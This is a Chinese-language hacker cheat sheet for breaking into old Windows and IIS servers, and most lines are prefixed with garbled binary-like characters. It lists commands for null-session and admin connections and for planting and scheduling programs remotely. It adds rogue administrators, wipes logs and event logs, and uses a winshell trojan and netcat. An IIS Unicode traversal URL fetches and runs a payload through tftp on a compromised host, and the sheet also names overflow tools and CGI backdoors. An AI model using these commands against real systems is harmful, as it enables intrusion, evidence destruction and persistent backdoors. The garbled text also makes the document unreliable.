网管和黑客都必须知道的命令
, ��X{>��� 常用的几条NET命令:
2�?q�(cpsN |CFRJN-J"� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
3G}AH E4�� ��5Wx~ZQZ (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
aH�z�Hvl� b;c�Ml���' (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
E%N2k|%8d_ �zZ-\�a[�F (查看远程主机时间) net time \\IP地址
�r(A.<`\ � \}0-^(9z�d (定时启动某个程序) at \\IP地址 02:18 readme.exe
�f58?5(Dc| 2�{|$T�2?e (查看共享) net view \\IP地址
{Qu"%h.A�l 2}U!:��bn( (查看netbios工作组列表) nbtstat -A IP地址
K�zU�lTl0� yHo[{,4itA (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
GEUg]��n�w W�Y�cA8�X/ (这两条把自己增加到管理员组): net user 用户名 密码 /add
PJ�4�(}a�� @~td`Z?1�y net localgroup Administrators 用户名 /add
*Mc7f��?�H 5s{j�=�.�O (断开连接) net use \\IP地址\ipc$ /delete
;]2s,za)qs S�k�Q�swH 扫尾:
�EbNd=Z'J� �Dh�4
6o|P del C:\winnt\system32\logfiles\*.*
�8�� .>/6M i�Uk-' �� del C:\winnt\ssytem32\config\*.evt
_�i0kc,*C\ _l`e#X�bG� del C:\winnt\system32\dtclog\*.*
6�A
R2htN^ q!�~ -(&S del C:\winnt\system32\*.log
�a?h*eAAc. �&EGqgNl�� del C:\winnt\system32\*.txt
q'�[}9e`Q� w*9b�r �SK del C:\winnt\*.txt
26?W
�nu60 �Wi��L��2 del C:\winnt\*.log
lCd@�jB{�� �5�K%SL1N� 一、netsvc.exe
nuQ�]8�-�, NE2pL@��sk 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
-_OS�%�ARa &
WO�i��ik netsvc /list \\IP地址
�El��j_,�z )j l��8!O7 netsvc schedule \\IP地址 /query
�VSX@e|Nj� K6J�Vg���$ netsvc \\IP地址 schedule /start
]��� ]U<UJ Z4K+ /<I� 二、OpenTelnet.exe
C�B�Y�X�]� P��Qm�q5N6 远程启动主机的Telnet服务,并绑定端口到7878,例如:
$lA
V�6I.� �rf:XRJ�<4 OpenTelnet \\IP地址 用户名 密码 1 7878
VXBY8;+�Yp 38�ES��($� 然后就可以telnet到主机的7878端口,进入DOS方式下:
eDI=��nSo� 8LkP)]4^sO telnet IP地址 7878
IA z�Z1#/3 +gd2|`��#� 三、winshell.exe
NH<gU_s8{9 ./vZe_o)j$ 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
AFvgbn�8Qh �,QIF ��&� p Path (查看winshell主程序的路径信息)
RprKm'b8x` 2zSG&�",2D b reBoot (重新启动机器)
o� �Pci66� �QS.>0i/7l d shutDown (关闭机器)
��C��;+(Zp @H�b'8��F s Shell (执行后你就会看到可爱的“C:\>”)
��fc=P�atg :#�E*Y8��- x eXit (退出本次登录会话,此命令并不终止winshell的运行)
@:0dd�b7�1 `?�g`bN`Vn CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
bu7'oB~:V^ �2a�Zw[7�s 四、3389登陆器,GUI方式登录远程主机的
%_-z�W�VJ� 9h90huyKF 五、elsave.exe
-ezY=��0Q& B5V_e!*5F* 事件日志清除工具
�WF&[HKOy/ JG�[o"&Sd� elsave -s \\IP地址 -l "application" -C
thi1k�J�`L _m�vxs��G elsave -s \\IP地址 -l "system" -C
v4��4}%$� �XKA�&XpF� elsave -s \\IP地址 -l "security" -C
5vAf7��\�* @oF$�L�M�D 执行后成功清除应用程序日志,系统日志,安全日志
]�r!��>��{ j:T/�iH!YF 六、hbulot.exe
�[]R? ViG� �o�;�a�:Dd 开启win2kserver和winxp的3389服务
�6Tw#^;�q- =\�#%j|9N9 hbulot [/r]
X�=JmF�97 sbkQ71T�: 使用/r表示安装完成后自动重起目标使设置生效。
}e��QRN<}P 9�/�/�+B�h 七、nc.exe(netcat.exe)
W�%2
80\h� v0D��q�@Q1 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
&c(WE
RW?- �$mm�up|;( 想要连接到某处: nc [-options] hostname port[s] [ports] ...
>h2%�[j��= uJ�Hu>M}~ 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
i�I@��jZVk 02�`$OTKz� 参数:
�.#u_#�=g? �)A�u�6Nf
-e prog 程序重定向,一旦连接,就执行 [危险!!]
��M2x��[�" ,/&'m13b/L -g gateway source-routing hop point[s], up to 8
l.\r�e"��Q EC�dvX0*a -G num source-routing pointer: 4, 8, 12, ...
:WI.LKlo�~ .x`M<L#M�( -h 帮助信息
\;-fi.Hrf$ |6UtW{2I/
-i secs 延时的间隔
[� xOzz�p4 ;=�j@,�
yu -l 监听模式,用于入站连接
�k:2Qu�G�^ EV��#�MQ�M -n 指定数字的IP地址,不能用hostname
tt?5�8d�m| =~Yn�z7 /x -o file 记录16进制的传输
)#a�[-.O�I <^b7�cOFQ� -p port 本地端口号
��G2LK�]�� <Llp\�Xc�Z -r 任意指定本地及远程端口
(�Rk_-9_E. +')f6P;t>= -s addr 本地源地址
=cN��&A_L( ]q-��g[e�' -u UDP模式
L�@75�-�T� BR^7�_q4q� -v 详细输出——用两个-v可得到更详细的内容
y-p70.�'{U cYx4�~�V^ -w secs timeout的时间
^_5L"F�]sP ���x:vu'A -z 将输入输出关掉——用于扫描时
/(�.6b��v� 八、TFTPD32.EXE
��
rhp�PCt �zWpqJK � 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
�GU�'t%�[� bWl�5(S` Z http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
4L-�:*b_v\ ��{7��cX#1 然后可以直接令文件运行:
EM7+��VO(� 2��o�a#0`{ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
%8*64T�")� {GvT�fZ�fp 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
V._6=�Z��J X1IeS��MAe 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
��Eh-�n�� t�t%MoQ)�� 一、一 Xscan命令行运行参数说明:
�A*.��/,KT �_,�;j�7%j 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
5Z��mw} M� ��oLWJ�m�� 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
t��NsPB6�Z �,D\�GGR�w xscan -file <主机列表文件名> <检测项目> [其他选项]
�n�A|.t�[v <���APB�11 其中<检测项目> 含义如下:
mrm^e9*Z� =X?\�MVW�B -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
)
�\�Y��7& i>Eg�G5iJ� -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
d=�,��%=�@ �1h���*)@� -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
�bifS� 2>c ��]M�)O YY -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
ZpUCf�S)|& j8��|g!>Nv -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
=fm]D�l9h* h�YQ_45Z*? [其他选项] 含义如下:
��*A��}cL� TF2>�4� p� -v: 显示详细扫描进度
kc7l�c|�'z mz�Q`N}]T: -p: 跳过Ping不通的主机
@�
�S��<-d 8 ��#ndFpu -o: 跳过没有检测到开放端口的主机
LPG�`^�SA #jAqra._�b -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
